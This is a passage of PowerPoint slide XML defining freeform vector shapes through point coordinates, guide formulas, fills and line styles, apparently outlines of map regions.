                    <a:lnTo>
                      <a:pt x="124" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="9"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36162" name="Freeform 295"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1454" y="2922"/>
                <a:ext cx="92" cy="102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 13 w 92"/>
                  <a:gd name="T1" fmla="*/ 76 h 102"/>
                  <a:gd name="T2" fmla="*/ 19 w 92"/>
                  <a:gd name="T3" fmla="*/ 66 h 102"/>
                  <a:gd name="T4" fmla="*/ 18 w 92"/>
                  <a:gd name="T5" fmla="*/ 59 h 102"/>
                  <a:gd name="T6" fmla="*/ 15 w 92"/>
                  <a:gd name="T7" fmla="*/ 60 h 102"/>
                  <a:gd name="T8" fmla="*/ 8 w 92"/>
                  <a:gd name="T9" fmla="*/ 64 h 102"/>
                  <a:gd name="T10" fmla="*/ 0 w 92"/>
                  <a:gd name="T11" fmla="*/ 59 h 102"/>
                  <a:gd name="T12" fmla="*/ 4 w 92"/>
                  <a:gd name="T13" fmla="*/ 55 h 102"/>
                  <a:gd name="T14" fmla="*/ 3 w 92"/>
                  <a:gd name="T15" fmla="*/ 48 h 102"/>
                  <a:gd name="T16" fmla="*/ 3 w 92"/>
                  <a:gd name="T17" fmla="*/ 43 h 102"/>
                  <a:gd name="T18" fmla="*/ 2 w 92"/>
                  <a:gd name="T19" fmla="*/ 37 h 102"/>
                  <a:gd name="T20" fmla="*/ 10 w 92"/>
                  <a:gd name="T21" fmla="*/ 32 h 102"/>
                  <a:gd name="T22" fmla="*/ 8 w 92"/>
                  <a:gd name="T23" fmla="*/ 28 h 102"/>
                  <a:gd name="T24" fmla="*/ 13 w 92"/>
                  <a:gd name="T25" fmla="*/ 22 h 102"/>
                  <a:gd name="T26" fmla="*/ 15 w 92"/>
                  <a:gd name="T27" fmla="*/ 15 h 102"/>
                  <a:gd name="T28" fmla="*/ 14 w 92"/>
                  <a:gd name="T29" fmla="*/ 10 h 102"/>
                  <a:gd name="T30" fmla="*/ 19 w 92"/>
                  <a:gd name="T31" fmla="*/ 8 h 102"/>
                  <a:gd name="T32" fmla="*/ 28 w 92"/>
                  <a:gd name="T33" fmla="*/ 4 h 102"/>
                  <a:gd name="T34" fmla="*/ 32 w 92"/>
                  <a:gd name="T35" fmla="*/ 0 h 102"/>
                  <a:gd name="T36" fmla="*/ 53 w 92"/>
                  <a:gd name="T37" fmla="*/ 10 h 102"/>
                  <a:gd name="T38" fmla="*/ 56 w 92"/>
                  <a:gd name="T39" fmla="*/ 15 h 102"/>
                  <a:gd name="T40" fmla="*/ 66 w 92"/>
                  <a:gd name="T41" fmla="*/ 19 h 102"/>
                  <a:gd name="T42" fmla="*/ 77 w 92"/>
                  <a:gd name="T43" fmla="*/ 16 h 102"/>
                  <a:gd name="T44" fmla="*/ 83 w 92"/>
                  <a:gd name="T45" fmla="*/ 21 h 102"/>
                  <a:gd name="T46" fmla="*/ 86 w 92"/>
                  <a:gd name="T47" fmla="*/ 23 h 102"/>
                  <a:gd name="T48" fmla="*/ 89 w 92"/>
                  <a:gd name="T49" fmla="*/ 29 h 102"/>
                  <a:gd name="T50" fmla="*/ 91 w 92"/>
                  <a:gd name="T51" fmla="*/ 37 h 102"/>
                  <a:gd name="T52" fmla="*/ 85 w 92"/>
                  <a:gd name="T53" fmla="*/ 48 h 102"/>
                  <a:gd name="T54" fmla="*/ 76 w 92"/>
                  <a:gd name="T55" fmla="*/ 58 h 102"/>
                  <a:gd name="T56" fmla="*/ 66 w 92"/>
                  <a:gd name="T57" fmla="*/ 64 h 102"/>
                  <a:gd name="T58" fmla="*/ 53 w 92"/>
                  <a:gd name="T59" fmla="*/ 69 h 102"/>
                  <a:gd name="T60" fmla="*/ 43 w 92"/>
                  <a:gd name="T61" fmla="*/ 77 h 102"/>
                  <a:gd name="T62" fmla="*/ 33 w 92"/>
                  <a:gd name="T63" fmla="*/ 99 h 102"/>
                  <a:gd name="T64" fmla="*/ 30 w 92"/>
                  <a:gd name="T65" fmla="*/ 102 h 102"/>
                  <a:gd name="T66" fmla="*/ 24 w 92"/>
                  <a:gd name="T67" fmla="*/ 98 h 102"/>
                  <a:gd name="T68" fmla="*/ 21 w 92"/>
                  <a:gd name="T69" fmla="*/ 92 h 102"/>
                  <a:gd name="T70" fmla="*/ 12 w 92"/>
                  <a:gd name="T71" fmla="*/ 92 h 102"/>
                  <a:gd name="T72" fmla="*/ 10 w 92"/>
                  <a:gd name="T73" fmla="*/ 87 h 102"/>
                  <a:gd name="T74" fmla="*/ 12 w 92"/>
                  <a:gd name="T75" fmla="*/ 81 h 102"/>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92"/>
                  <a:gd name="T115" fmla="*/ 0 h 102"/>
                  <a:gd name="T116" fmla="*/ 92 w 92"/>
                  <a:gd name="T117" fmla="*/ 102 h 102"/>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92" h="102">
                    <a:moveTo>
                      <a:pt x="12" y="77"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="77"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36163" name="Freeform 296"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1454" y="2922"/>
                <a:ext cx="92" cy="102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 13 w 92"/>
                  <a:gd name="T1" fmla="*/ 76 h 102"/>
                  <a:gd name="T2" fmla="*/ 19 w 92"/>
                  <a:gd name="T3" fmla="*/ 66 h 102"/>
                  <a:gd name="T4" fmla="*/ 18 w 92"/>
                  <a:gd name="T5" fmla="*/ 59 h 102"/>
                  <a:gd name="T6" fmla="*/ 15 w 92"/>
                  <a:gd name="T7" fmla="*/ 60 h 102"/>
                  <a:gd name="T8" fmla="*/ 8 w 92"/>
                  <a:gd name="T9" fmla="*/ 64 h 102"/>
                  <a:gd name="T10" fmla="*/ 0 w 92"/>
                  <a:gd name="T11" fmla="*/ 59 h 102"/>
                  <a:gd name="T12" fmla="*/ 4 w 92"/>
                  <a:gd name="T13" fmla="*/ 55 h 102"/>
                  <a:gd name="T14" fmla="*/ 3 w 92"/>
                  <a:gd name="T15" fmla="*/ 48 h 102"/>
                  <a:gd name="T16" fmla="*/ 3 w 92"/>
                  <a:gd name="T17" fmla="*/ 43 h 102"/>
                  <a:gd name="T18" fmla="*/ 2 w 92"/>
                  <a:gd name="T19" fmla="*/ 37 h 102"/>
                  <a:gd name="T20" fmla="*/ 10 w 92"/>
                  <a:gd name="T21" fmla="*/ 32 h 102"/>
                  <a:gd name="T22" fmla="*/ 8 w 92"/>
                  <a:gd name="T23" fmla="*/ 28 h 102"/>
                  <a:gd name="T24" fmla="*/ 13 w 92"/>
                  <a:gd name="T25" fmla="*/ 22 h 102"/>
                  <a:gd name="T26" fmla="*/ 15 w 92"/>
                  <a:gd name="T27" fmla="*/ 15 h 102"/>
                  <a:gd name="T28" fmla="*/ 14 w 92"/>
                  <a:gd name="T29" fmla="*/ 10 h 102"/>
                  <a:gd name="T30" fmla="*/ 19 w 92"/>
                  <a:gd name="T31" fmla="*/ 8 h 102"/>
                  <a:gd name="T32" fmla="*/ 28 w 92"/>
                  <a:gd name="T33" fmla="*/ 4 h 102"/>
                  <a:gd name="T34" fmla="*/ 32 w 92"/>
                  <a:gd name="T35" fmla="*/ 0 h 102"/>
                  <a:gd name="T36" fmla="*/ 53 w 92"/>
                  <a:gd name="T37" fmla="*/ 10 h 102"/>
                  <a:gd name="T38" fmla="*/ 56 w 92"/>
                  <a:gd name="T39" fmla="*/ 15 h 102"/>
                  <a:gd name="T40" fmla="*/ 66 w 92"/>
                  <a:gd name="T41" fmla="*/ 19 h 102"/>
                  <a:gd name="T42" fmla="*/ 77 w 92"/>
                  <a:gd name="T43" fmla="*/ 16 h 102"/>
                  <a:gd name="T44" fmla="*/ 83 w 92"/>
                  <a:gd name="T45" fmla="*/ 21 h 102"/>
                  <a:gd name="T46" fmla="*/ 86 w 92"/>
                  <a:gd name="T47" fmla="*/ 23 h 102"/>
                  <a:gd name="T48" fmla="*/ 89 w 92"/>
                  <a:gd name="T49" fmla="*/ 29 h 102"/>
                  <a:gd name="T50" fmla="*/ 91 w 92"/>
                  <a:gd name="T51" fmla="*/ 37 h 102"/>
                  <a:gd name="T52" fmla="*/ 85 w 92"/>
                  <a:gd name="T53" fmla="*/ 48 h 102"/>
                  <a:gd name="T54" fmla="*/ 76 w 92"/>
                  <a:gd name="T55" fmla="*/ 58 h 102"/>
                  <a:gd name="T56" fmla="*/ 66 w 92"/>
                  <a:gd name="T57" fmla="*/ 64 h 102"/>
                  <a:gd name="T58" fmla="*/ 53 w 92"/>
                  <a:gd name="T59" fmla="*/ 69 h 102"/>
                  <a:gd name="T60" fmla="*/ 43 w 92"/>
                  <a:gd name="T61" fmla="*/ 77 h 102"/>
                  <a:gd name="T62" fmla="*/ 33 w 92"/>
                  <a:gd name="T63" fmla="*/ 99 h 102"/>
                  <a:gd name="T64" fmla="*/ 30 w 92"/>
                  <a:gd name="T65" fmla="*/ 102 h 102"/>
                  <a:gd name="T66" fmla="*/ 24 w 92"/>
                  <a:gd name="T67" fmla="*/ 98 h 102"/>
                  <a:gd name="T68" fmla="*/ 21 w 92"/>
                  <a:gd name="T69" fmla="*/ 92 h 102"/>
                  <a:gd name="T70" fmla="*/ 12 w 92"/>
                  <a:gd name="T71" fmla="*/ 92 h 102"/>
                  <a:gd name="T72" fmla="*/ 10 w 92"/>
                  <a:gd name="T73" fmla="*/ 87 h 102"/>
                  <a:gd name="T74" fmla="*/ 12 w 92"/>
                  <a:gd name="T75" fmla="*/ 81 h 102"/>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92"/>
                  <a:gd name="T115" fmla="*/ 0 h 102"/>
                  <a:gd name="T116" fmla="*/ 92 w 92"/>
                  <a:gd name="T117" fmla="*/ 102 h 102"/>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92" h="102">
                    <a:moveTo>
                      <a:pt x="12" y="77"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
